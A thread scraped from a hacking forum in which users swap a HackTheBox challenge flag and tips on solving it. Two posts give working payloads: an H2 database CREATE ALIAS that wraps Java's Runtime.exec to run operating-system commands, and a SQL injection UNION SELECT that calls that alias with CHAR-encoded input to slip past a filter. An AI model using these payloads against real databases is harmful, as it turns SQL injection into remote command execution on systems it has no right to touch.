Pentest Notes Hackthebox Challenge flag
by trevor69000 - Sunday October 27, 2024 at 07:17 AM
Advanced User

Posts: 78
Threads: 28
Joined: Apr 2024
Reputation: 5

#1
10-27-2024, 07:17 AM
flag
Hidden Content
You must register or login to view this content.
Reply
RaidForums
Member
Posts: 89
Threads: 4
Joined: Oct 2023
Reputation: 0

#2
10-27-2024, 03:19 PM
Will be interesting
Reply
RaidForums
Member
Posts: 42
Threads: 1
Joined: Oct 2023
Reputation: 0

#3
10-27-2024, 07:50 PM
you should better explain how to bypass filter for $$ and CONCAT instead of just flag
Reply
RaidForums
Member
Posts: 98
Threads: 6
Joined: Mar 2024
Reputation: 17

#4
10-27-2024, 08:12 PM
(10-27-2024, 07:50 PM)Steward Wrote: you should better explain how to bypass filter for $$ and CONCAT instead of just flag

create aliases without a `$`
CREATE ALIAS EXECVE AS 'String execve(String cmd) throws java.io.IOException { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").hasNext() ? new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").next() : ""; }';
Reply
Banned

Posts: 45
Threads: 0
Joined: Sep 2023
Reputation: 0

#5
10-28-2024, 10:06 AM
Will be interesting
Ban reason: Replying With Hidden Content (Permanent)
Reply
RaidForums
Member
Posts: 19
Threads: 0
Joined: Jun 2024
Reputation: 1

#6
10-30-2024, 07:39 PM
(10-27-2024, 07:17 AM)trevor69000 Wrote: flag

do you have a walkthrough for this ?
Reply
Banned

Posts: 29
Threads: 0
Joined: Sep 2024
Reputation: 0

#7
10-31-2024, 09:44 AM
Thanks for sharing!!!!!!!!
Ban reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect. (Permanent)
Reply
RaidForums
Member
Posts: 5
Threads: 0
Joined: Jul 2024
Reputation: 0

#8
11-03-2024, 09:18 AM
how can i turn the SQLi into  a way to get the flag
Reply
Elite User

Posts: 272
Threads: 7
Joined: Oct 2023
Reputation: 0

#9
11-05-2024, 04:39 PM
Using the alias created to read files in OS
Reply
RaidForums
Member
Posts: 13
Threads: 0
Joined: Nov 2024
Reputation: 0

#10
11-14-2024, 10:59 PM (This post was last modified: 11-14-2024, 11:00 PM by 0xhdfg.)
(10-27-2024, 08:12 PM)mazafaka555 Wrote:
(10-27-2024, 07:50 PM)Steward Wrote: you should better explain how to bypass filter for $$ and CONCAT instead of just flag

create aliases without a  `$`
CREATE ALIAS EXECVE AS 'String execve(String cmd) throws java.io.IOException { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").hasNext() ? new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").next() : ""; }';


How can I then use the alias? I'm trying something like: 
SQL Injection' OR 1=0 UNION SELECT EXECVE(CHAR(119) + CHAR(104) + CHAR(111) + CHAR(97) + CHAR(109) + CHAR(105)) -- -
to bypass CONCAT but I don't get it to work :/
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 88,710 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 16 2,276 03-28-2026, 03:32 AM
Last Post: lulaladrow
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 597 88,992 03-27-2026, 10:54 PM
Last Post: w3soul
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 7,490 03-27-2026, 07:22 PM
Last Post: stn
  All reversing challenge - HTB - Flags @ 02/03/2025 fr34cker 7 1,275 03-27-2026, 08:01 AM
Last Post: escowbang



 Users browsing this thread: 1 Guest(s)